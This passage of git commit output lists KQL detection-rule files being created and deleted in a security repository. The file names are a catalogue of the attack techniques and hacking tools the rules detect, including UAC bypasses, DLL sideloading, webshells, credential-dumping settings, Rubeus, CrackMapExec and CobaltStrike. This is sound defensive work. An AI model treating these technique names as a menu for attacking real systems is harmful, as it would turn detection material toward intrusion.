KQL/rules/Persistence/potential_persistence_via_typedpaths.kql create mode 100644 KQL/rules/Persistence/potential_persistence_via_visual_studio_tools_for_office.kql create mode 100644 KQL/rules/Persistence/potential_privilege_escalation_via_service_permissions_weakness.kql create mode 100644 KQL/rules/Persistence/potential_qakbot_registry_activity.kql create mode 100644 KQL/rules/Persistence/potential_rcdll_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_default_location.kql create mode 100644 KQL/rules/Persistence/potential_rjvplatform_dll_sideloading_from_non_default_location.kql create mode 100644 KQL/rules/Persistence/potential_roboform_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_sentinelone_shell_context_menu_scan_command_tampering.kql create mode 100644 
KQL/rules/Persistence/potential_shelldispatch_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_shim_database_persistence_via_sdbinst_exe.kql create mode 100644 KQL/rules/Persistence/potential_smadhook_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_solidpdfcreator_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_suspicious_powershell_module_file_created.kql create mode 100644 KQL/rules/Persistence/potential_suspicious_registry_file_imported_via_reg_exe.kql create mode 100644 KQL/rules/Persistence/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql create mode 100644 KQL/rules/Persistence/potential_vivaldi_elf_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_waveedit_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potential_webshell_creation_on_static_website.kql create mode 100644 KQL/rules/Persistence/potential_wwlib_dll_sideloading.kql create mode 100644 KQL/rules/Persistence/potentially_suspicious_child_process_of_keyscrambler_exe.kql create mode 100644 KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql create mode 100644 KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql create mode 100644 KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql create mode 100644 KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql create mode 100644 KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql create mode 100644 KQL/rules/Persistence/powershell_module_file_created.kql create mode 100644 KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql create mode 100644 KQL/rules/Persistence/powershell_profile_modification.kql create mode 100644 KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql create mode 100644 
KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql create mode 100644 KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql create mode 100644 KQL/rules/Persistence/pua_system_informer_execution.kql create mode 100644 KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql create mode 100644 KQL/rules/Persistence/reg_add_suspicious_paths.kql create mode 100644 KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql create mode 100644 KQL/rules/Persistence/registry_explorer_policy_modification.kql create mode 100644 KQL/rules/Persistence/registry_hide_function_from_user.kql create mode 100644 KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql create mode 100644 KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql create mode 100644 KQL/rules/Persistence/registry_modification_via_regini_exe.kql create mode 100644 KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql create mode 100644 KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql create mode 100644 KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql create mode 100644 KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql create mode 100644 KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql create mode 100644 KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql create mode 100644 KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql create mode 100644 KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql create mode 100644 KQL/rules/Persistence/run_once_task_configuration_in_registry.kql create mode 100644 KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql create mode 100644 
KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql create mode 100644 KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_registry_set.kql create mode 100644 KQL/rules/Persistence/service_binary_in_suspicious_folder.kql create mode 100644 KQL/rules/Persistence/service_dacl_abuse_to_hide_services_via_sc_exe.kql create mode 100644 KQL/rules/Persistence/service_security_descriptor_tampering_via_sc_exe.kql create mode 100644 KQL/rules/Persistence/servicedll_hijack.kql create mode 100644 KQL/rules/Persistence/shell_open_registry_keys_manipulation.kql create mode 100644 KQL/rules/Persistence/shimcache_flush.kql create mode 100644 KQL/rules/Persistence/startup_item_file_created_macos.kql create mode 100644 KQL/rules/Persistence/suspicious_aspx_file_drop_by_exchange.kql create mode 100644 KQL/rules/Persistence/suspicious_chromium_browser_instance_executed_with_custom_extension.kql create mode 100644 KQL/rules/Persistence/suspicious_debugger_registration_cmdline.kql create mode 100644 KQL/rules/Persistence/suspicious_file_creation_activity_from_fake_recycle_bin_folder.kql create mode 100644 KQL/rules/Persistence/suspicious_file_drop_by_exchange.kql create mode 100644 KQL/rules/Persistence/suspicious_file_write_to_webapps_root_directory.kql create mode 100644 KQL/rules/Persistence/suspicious_iis_module_registration.kql create mode 100644 KQL/rules/Persistence/suspicious_new_service_creation.kql create mode 100644 KQL/rules/Persistence/suspicious_printer_driver_empty_manufacturer.kql create mode 100644 KQL/rules/Persistence/suspicious_process_by_web_server_process.kql create mode 100644 KQL/rules/Persistence/suspicious_process_execution_from_fake_recycle_bin_folder.kql create mode 100644 KQL/rules/Persistence/suspicious_registry_modification_from_ads_via_regini_exe.kql create mode 100644 KQL/rules/Persistence/suspicious_screensave_change_by_reg_exe.kql create mode 100644 
KQL/rules/Persistence/suspicious_service_path_modification.kql create mode 100644 KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql create mode 100644 KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql create mode 100644 KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql create mode 100644 KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql create mode 100644 KQL/rules/Persistence/uac_bypass_with_fake_dll.kql create mode 100644 KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql create mode 100644 KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql create mode 100644 KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql create mode 100644 KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql create mode 100644 KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql create mode 100644 KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql create mode 100644 KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql create mode 100644 KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql create mode 100644 KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql create mode 100644 KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql create mode 100644 KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql create mode 100644 KQL/rules/Persistence/vscode_powershell_profile_modification.kql create mode 100644 KQL/rules/Persistence/wdigest_credguard_registry_modification.kql create mode 100644 KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql create mode 100644 KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql create mode 100644 KQL/rules/Persistence/webshell_hacking_activity_patterns.kql create mode 100644 KQL/rules/Persistence/webshell_tool_reconnaissance_activity.kql create mode 100644 
KQL/rules/Persistence/winlogon_allowmultipletssessions_enable.kql create mode 100644 KQL/rules/Persistence/wmi_persistence_script_event_consumer.kql create mode 100644 KQL/rules/Persistence/wmi_persistence_security.kql create mode 100644 KQL/rules/Privilege Escalation/add_port_monitor_persistence_in_registry.kql create mode 100644 KQL/rules/Privilege Escalation/allow_service_access_using_security_descriptor_tampering_via_sc_exe.kql create mode 100644 KQL/rules/Privilege Escalation/atbroker_registry_change.kql create mode 100644 KQL/rules/Privilege Escalation/bypass_uac_using_delegateexecute.kql create mode 100644 KQL/rules/Privilege Escalation/bypass_uac_using_event_viewer.kql create mode 100644 KQL/rules/Privilege Escalation/bypass_uac_using_silentcleanup_task.kql create mode 100644 KQL/rules/Privilege Escalation/bypass_uac_via_cmstp.kql create mode 100644 KQL/rules/Privilege Escalation/bypass_uac_via_wsreset_exe.kql create mode 100644 KQL/rules/Privilege Escalation/change_default_file_association_to_executable_via_assoc.kql create mode 100644 KQL/rules/Privilege Escalation/change_default_file_association_via_assoc.kql create mode 100644 KQL/rules/Privilege Escalation/changing_existing_service_imagepath_value_via_reg_exe.kql create mode 100644 KQL/rules/Privilege Escalation/classes_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/com_hijacking_via_treatas.kql create mode 100644 KQL/rules/Privilege Escalation/com_object_hijacking_via_modification_of_default_system_clsid_default_value.kql create mode 100644 KQL/rules/Privilege Escalation/common_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/control_panel_items.kql create mode 100644 KQL/rules/Privilege Escalation/created_files_by_microsoft_sync_center.kql create mode 100644 KQL/rules/Privilege Escalation/creation_exe_for_service_with_unquoted_path.kql create mode 100644 KQL/rules/Privilege 
Escalation/creation_of_werfault_exe_wer_dll_in_unusual_folder.kql create mode 100644 KQL/rules/Privilege Escalation/currentcontrolset_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/currentversion_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/currentversion_nt_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/default_rdp_port_changed_to_non_standard_port.kql create mode 100644 KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql create mode 100644 KQL/rules/Privilege Escalation/dhcp_callout_dll_installation.kql create mode 100644 KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql create mode 100644 KQL/rules/Privilege Escalation/dll_load_via_lsass.kql create mode 100644 KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql create mode 100644 KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql create mode 100644 KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql create mode 100644 KQL/rules/Privilege Escalation/fax_service_dll_search_order_hijack.kql create mode 100644 KQL/rules/Privilege Escalation/file_creation_in_suspicious_directory_by_msdt_exe.kql create mode 100644 KQL/rules/Privilege Escalation/guest_account_enabled_via_sysadminctl.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql 
create mode 100644 KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql create mode 100644 KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql create mode 100644 KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql create mode 100644 KQL/rules/Privilege Escalation/internet_explorer_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/launch_agent_daemon_execution_via_launchctl.kql create mode 100644 KQL/rules/Privilege Escalation/linux_sudo_chroot_execution.kql create mode 100644 KQL/rules/Privilege Escalation/microsoft_sync_center_suspicious_network_connections.kql create mode 100644 KQL/rules/Privilege Escalation/narrator_s_feedback_hub_persistence.kql create mode 100644 KQL/rules/Privilege Escalation/network_connection_initiated_via_notepad_exe.kql create mode 100644 KQL/rules/Privilege Escalation/new_activescripteventconsumer_created_via_wmic_exe.kql create mode 100644 KQL/rules/Privilege Escalation/new_custom_shim_database_created.kql create mode 100644 KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed.kql create mode 100644 KQL/rules/Privilege Escalation/new_dns_serverlevelplugindll_installed_via_dnscmd_exe.kql create mode 100644 KQL/rules/Privilege Escalation/new_netsh_helper_dll_registered_from_a_suspicious_location.kql create mode 100644 KQL/rules/Privilege Escalation/new_outlook_macro_created.kql create mode 100644 KQL/rules/Privilege Escalation/new_run_key_pointing_to_suspicious_folder.kql create mode 100644 KQL/rules/Privilege Escalation/office_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/outlook_macro_execution_without_warning_setting_enabled.kql create mode 100644 KQL/rules/Privilege Escalation/password_set_to_never_expire_via_wmi.kql create mode 100644 KQL/rules/Privilege Escalation/persistence_via_cron_files.kql create mode 100644 KQL/rules/Privilege Escalation/persistence_via_sudoers_files.kql create 
mode 100644 KQL/rules/Privilege Escalation/potential_com_object_hijacking_via_treatas_subkey_registry.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_injection_or_execution_using_tracker_exe.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_sideloading_of_dbgmodel_dll.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mpsvc_dll.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_sideloading_of_mscorsvc_dll.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_sideloading_using_coregen_exe.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_sideloading_via_deviceenroller_exe.kql create mode 100644 KQL/rules/Privilege Escalation/potential_dll_sideloading_via_vmware_xfer.kql create mode 100644 KQL/rules/Privilege Escalation/potential_initial_access_via_dll_search_order_hijacking.kql create mode 100644 KQL/rules/Privilege Escalation/potential_linux_process_code_injection_via_dd_utility.kql create mode 100644 KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading.kql create mode 100644 KQL/rules/Privilege Escalation/potential_mpclient_dll_sideloading_via_defender_binaries.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_attempt_via_existing_service_tampering.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_using_debugpath.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_app_paths_default_property.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_appcompat_registerapprestart_layer.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_globalflags.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_logon_scripts_commandline.kql create mode 100644 KQL/rules/Privilege 
Escalation/potential_persistence_via_logon_scripts_registry.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_microsoft_compatibility_appraiser.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_netsh_helper_dll_registry.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_outlook_loadmacroprovideronboot_setting.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_plistbuddy.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_powershell_search_order_hijacking_task.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_scrobj_dll_com_hijacking.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_in_uncommon_location.kql create mode 100644 KQL/rules/Privilege Escalation/potential_persistence_via_shim_database_modification.kql create mode 100644 KQL/rules/Privilege Escalation/potential_privilege_escalation_using_symlink_between_osk_and_cmd.kql create mode 100644 KQL/rules/Privilege Escalation/potential_process_injection_via_msra_exe.kql create mode 100644 KQL/rules/Privilege Escalation/potential_psfactorybuffer_com_hijacking.kql create mode 100644 KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_dbgmanageddebugger.kql create mode 100644 KQL/rules/Privilege Escalation/potential_registry_persistence_attempt_via_windows_telemetry.kql create mode 100644 KQL/rules/Privilege Escalation/potential_ripzip_attack_on_startup_folder.kql create mode 100644 KQL/rules/Privilege Escalation/potential_ssh_tunnel_persistence_install_using_a_scheduled_task.kql create mode 100644 KQL/rules/Privilege Escalation/potential_startup_shortcut_persistence_via_powershell_exe.kql create mode 100644 KQL/rules/Privilege Escalation/potential_uac_bypass_via_sdclt_exe.kql create 
mode 100644 KQL/rules/Privilege Escalation/powershell_web_access_feature_enabled_via_dism.kql create mode 100644 KQL/rules/Privilege Escalation/registry_persistence_via_explorer_run_key.kql create mode 100644 KQL/rules/Privilege Escalation/regsvr32_dll_execution_with_uncommon_extension.kql create mode 100644 KQL/rules/Privilege Escalation/renamed_vmnat_exe_execution.kql create mode 100644 KQL/rules/Privilege Escalation/root_account_enable_via_dsenableroot.kql create mode 100644 KQL/rules/Privilege Escalation/rundll32_registered_com_objects.kql create mode 100644 KQL/rules/Privilege Escalation/schedule_task_creation_from_env_variable_or_potentially_suspicious_path_via_schtasks_exe.kql create mode 100644 KQL/rules/Privilege Escalation/scheduled_task_creation_masquerading_as_system_processes.kql create mode 100644 KQL/rules/Privilege Escalation/scheduled_task_creation_with_curl_and_powershell_execution_combo.kql create mode 100644 KQL/rules/Privilege Escalation/scheduled_task_executing_encoded_payload_from_registry.kql create mode 100644 KQL/rules/Privilege Escalation/scheduled_task_executing_payload_from_registry.kql create mode 100644 KQL/rules/Privilege Escalation/scheduled_task_job_at.kql create mode 100644 KQL/rules/Privilege Escalation/scheduled_taskcache_change_by_uncommon_program.kql create mode 100644 KQL/rules/Privilege Escalation/schtasks_creation_or_modification_with_system_privileges.kql create mode 100644 KQL/rules/Privilege Escalation/schtasks_from_suspicious_folders.kql create mode 100644 KQL/rules/Privilege Escalation/security_privileges_enumeration_via_whoami_exe.kql create mode 100644 KQL/rules/Privilege Escalation/security_support_provider_ssp_added_to_lsa_configuration.kql create mode 100644 KQL/rules/Privilege Escalation/session_manager_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/setup16_exe_execution_with_custom_lst_file.kql create mode 100644 KQL/rules/Privilege Escalation/startup_folder_file_write.kql create 
mode 100644 KQL/rules/Privilege Escalation/sticky_key_like_backdoor_execution.kql create mode 100644 KQL/rules/Privilege Escalation/sticky_key_like_backdoor_usage_registry.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_autorun_registry_modified_via_wmi.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_command_patterns_in_scheduled_task_creation.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_desktop_ini_action.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_driver_install_by_pnputil_exe.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_get_variable_exe_creation.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_grpconv_execution.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_gup_usage.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_modification_of_scheduled_tasks.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_ntlm_authentication_on_the_printer_spooler_service.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_outlook_macro_created.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_powershell_in_registry_run_keys.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_run_key_from_download.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_runas_like_flag_combination.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_rundll32_invoking_inline_vbscript.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_involving_temp_folder.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_scheduled_task_creation_via_masqueraded_xml_file.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_scheduled_task_name_as_guid.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_scheduled_task_write_to_system32_tasks.kql create mode 100644 KQL/rules/Privilege 
Escalation/suspicious_schtasks_execution_appdata_folder.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_type_with_high_privileges.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_schtasks_schedule_types.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_screensaver_binary_file_creation.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_service_dacl_modification_via_set_service_cmdlet.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_shim_database_patching_activity.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_startup_folder_persistence.kql create mode 100644 KQL/rules/Privilege Escalation/suspicious_userinit_child_process.kql create mode 100644 KQL/rules/Privilege Escalation/sysinternals_psservice_execution.kql create mode 100644 KQL/rules/Privilege Escalation/sysinternals_pssuspend_execution.kql create mode 100644 KQL/rules/Privilege Escalation/system_scripts_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/tasks_folder_evasion.kql create mode 100644 KQL/rules/Privilege Escalation/triple_cross_ebpf_rootkit_default_persistence.kql create mode 100644 KQL/rules/Privilege Escalation/trustedpath_uac_bypass_pattern.kql create mode 100644 KQL/rules/Privilege Escalation/uac_disabled.kql create mode 100644 KQL/rules/Privilege Escalation/uac_notification_disabled.kql create mode 100644 KQL/rules/Privilege Escalation/uac_secure_desktop_prompt_disabled.kql create mode 100644 KQL/rules/Privilege Escalation/uncommon_userinit_child_process.kql create mode 100644 KQL/rules/Privilege Escalation/user_added_to_highly_privileged_group.kql create mode 100644 KQL/rules/Privilege Escalation/user_added_to_local_administrators_group.kql create mode 100644 KQL/rules/Privilege Escalation/user_added_to_root_sudoers_group_using_usermod.kql create mode 100644 KQL/rules/Privilege Escalation/using_settingsynchost_exe_as_lolbin.kql create mode 100644 
KQL/rules/Privilege Escalation/vbscript_payload_stored_in_registry.kql create mode 100644 KQL/rules/Privilege Escalation/whoami_exe_execution_from_privileged_process.kql create mode 100644 KQL/rules/Privilege Escalation/windows_event_log_access_tampering_via_registry.kql create mode 100644 KQL/rules/Privilege Escalation/windows_terminal_profile_settings_modification_by_uncommon_process.kql create mode 100644 KQL/rules/Privilege Escalation/winekey_registry_modification.kql create mode 100644 KQL/rules/Privilege Escalation/winlogon_notify_key_logon_persistence.kql create mode 100644 KQL/rules/Privilege Escalation/winrar_creating_files_in_startup_locations.kql create mode 100644 KQL/rules/Privilege Escalation/winsock2_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/wmi_backdoor_exchange_transport_agent.kql create mode 100644 KQL/rules/Privilege Escalation/wmi_persistence_command_line_event_consumer.kql create mode 100644 KQL/rules/Privilege Escalation/wmi_persistence_script_event_consumer_file_write.kql create mode 100644 KQL/rules/Privilege Escalation/wow6432node_classes_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/wow6432node_currentversion_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/wow6432node_windows_nt_currentversion_autorun_keys_modification.kql create mode 100644 KQL/rules/Privilege Escalation/writing_local_admin_share.kql create mode 100644 KQL/rules/Privilege Escalation/xwizard_exe_execution_from_non_default_location.kql create mode 100644 KQL/rules/Reconnaissance/access_of_sudoers_file_content.kql create mode 100644 KQL/rules/Reconnaissance/linux_recon_indicators.kql create mode 100644 KQL/rules/Reconnaissance/potential_active_directory_enumeration_using_ad_module_proccreation.kql create mode 100644 KQL/rules/Reconnaissance/print_history_file_contents.kql create mode 100644 KQL/rules/Reconnaissance/pua_pingcastle_execution.kql create mode 100644 
KQL/rules/Reconnaissance/pua_pingcastle_execution_from_potentially_suspicious_parent.kql create mode 100644 KQL/rules/Reconnaissance/suspicious_git_clone.kql create mode 100644 KQL/rules/Reconnaissance/suspicious_git_clone_linux.kql create mode 100644 KQL/rules/Resource Development/creation_of_a_diagcab.kql create mode 100644 KQL/rules/Resource Development/hacktool_purplesharp_execution.kql create mode 100644 KQL/rules/Resource Development/hybridconnectionmanager_service_installation_registry.kql create mode 100644 KQL/rules/Resource Development/potential_execution_of_sysinternals_tools.kql create mode 100644 KQL/rules/Resource Development/potential_privilege_escalation_to_local_system.kql create mode 100644 KQL/rules/Resource Development/potential_psexec_remote_execution.kql create mode 100644 KQL/rules/Resource Development/psexec_paexec_escalation_to_local_system.kql create mode 100644 KQL/rules/Resource Development/pua_csexec_execution.kql create mode 100644 KQL/rules/Resource Development/pua_sysinternal_tool_execution_registry.kql create mode 100644 KQL/rules/Resource Development/pua_sysinternals_tools_execution_registry.kql create mode 100644 KQL/rules/Resource Development/renamed_sysinternals_debugview_execution.kql create mode 100644 KQL/rules/Resource Development/suspicious_execution_of_renamed_sysinternals_tools_registry.kql create mode 100644 KQL/rules/Resource Development/suspicious_keyboard_layout_load.kql create mode 100644 KQL/rules/Resource Development/uncommon_file_created_in_office_startup_folder.kql create mode 100644 KQL/rules/Resource Development/usage_of_renamed_sysinternals_tools_registryset.kql create mode 100644 KQL/rules/Resource Development/vhd_image_download_via_browser.kql delete mode 100644 Lateral Movement/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql delete mode 100644 Lateral Movement/HackTool_-_KrbRelayUp_Execution.kql delete mode 100644 Lateral Movement/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql delete mode 
100644 Lateral Movement/HackTool_-_Rubeus_Execution.kql delete mode 100644 Lateral Movement/HackTool_-_SharpMove_Tool_Execution.kql delete mode 100644 Lateral Movement/HackTool_-_WinRM_Access_Via_Evil-WinRM.kql delete mode 100644 Lateral Movement/HackTool_-_Wmiexec_Default_Powershell_Command.kql delete mode 100644 Lateral Movement/MMC_Spawning_Windows_Shell.kql delete mode 100644 Lateral Movement/Mstsc.EXE_Execution_From_Uncommon_Parent.kql delete mode 100644 Lateral Movement/New_PortProxy_Registry_Entry_Added.kql delete mode 100644 Lateral Movement/New_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql delete mode 100644 Lateral Movement/New_Remote_Desktop_Connection_Initiated_Via_Mstsc.EXE.kql delete mode 100644 Lateral Movement/Outbound_RDP_Connections_Over_Non-Standard_Tools.kql delete mode 100644 Lateral Movement/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql delete mode 100644 Lateral Movement/PSEXEC_Remote_Execution_File_Artefact.kql delete mode 100644 Lateral Movement/PUA_-_Radmin_Viewer_Utility_Execution.kql delete mode 100644 Lateral Movement/Password_Provided_In_Command_Line_Of_Net.EXE.kql delete mode 100644 Lateral Movement/Port_Forwarding_Activity_Via_SSH.EXE.kql delete mode 100644 Lateral Movement/Potential_CobaltStrike_Service_Installations_-_Registry.kql delete mode 100644 Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack.kql delete mode 100644 Lateral Movement/Potential_DCOM_InternetExplorer.Application_DLL_Hijack_-_Image_Load.kql delete mode 100644 Lateral Movement/Potential_Excel.EXE_DCOM_Lateral_Movement_Via_ActivateMicrosoftApp.kql delete mode 100644 Lateral Movement/Potential_MSTSC_Shadowing_Activity.kql delete mode 100644 Lateral Movement/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql delete mode 100644 Lateral Movement/Potential_Remote_Desktop_Tunneling.kql delete mode 100644 Lateral Movement/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql delete mode 100644 Lateral 
Movement/Privilege_Escalation_via_Named_Pipe_Impersonation.kql delete mode 100644 Lateral Movement/RDP_Over_Reverse_SSH_Tunnel.kql delete mode 100644 Lateral Movement/RDP_Port_Forwarding_Rule_Added_Via_Netsh.EXE.kql delete mode 100644 Lateral Movement/Rundll32_Execution_Without_Parameters.kql delete mode 100644 Lateral Movement/Suspicious_Plink_Port_Forwarding.kql delete mode 100644 Lateral Movement/Suspicious_RDP_Redirect_Using_TSCON.kql delete mode 100644 Lateral Movement/Suspicious_SysAidServer_Child.kql delete mode 100644 Lateral Movement/Suspicious_UltraVNC_Execution.kql delete mode 100644 Lateral Movement/Suspicious_WSMAN_Provider_Image_Loads.kql delete mode 100644 Lateral Movement/Terminal_Service_Process_Spawn.kql delete mode 100644 Lateral Movement/Uncommon_Outbound_Kerberos_Connection.kql delete mode 100644 Lateral Movement/User_Added_to_Remote_Desktop_Users_Group.kql delete mode 100644 Lateral Movement/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql delete mode 100644 Lateral Movement/Windows_Admin_Share_Mount_Via_Net.EXE.kql delete mode 100644 Lateral Movement/Windows_Internet_Hosted_WebDav_Share_Mount_Via_Net.EXE.kql delete mode 100644 Lateral Movement/Windows_Share_Mount_Via_Net.EXE.kql delete mode 100644 Lateral Movement/Wmiexec_Default_Output_File.kql delete mode 100644 Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack.kql delete mode 100644 Lateral Movement/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql delete mode 100644 Lateral Movement/Writing_Local_Admin_Share.kql delete mode 100644 Persistence/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql delete mode 100644 Persistence/Add_Debugger_Entry_To_AeDebug_For_Persistence.kql delete mode 100644 Persistence/Add_Debugger_Entry_To_Hangs_Key_For_Persistence.kql delete mode 100644 Persistence/Add_Port_Monitor_Persistence_in_Registry.kql delete mode 100644 Persistence/Allow_Service_Access_Using_Security_Descriptor_Tampering_Via_Sc.EXE.kql delete mode 100644 
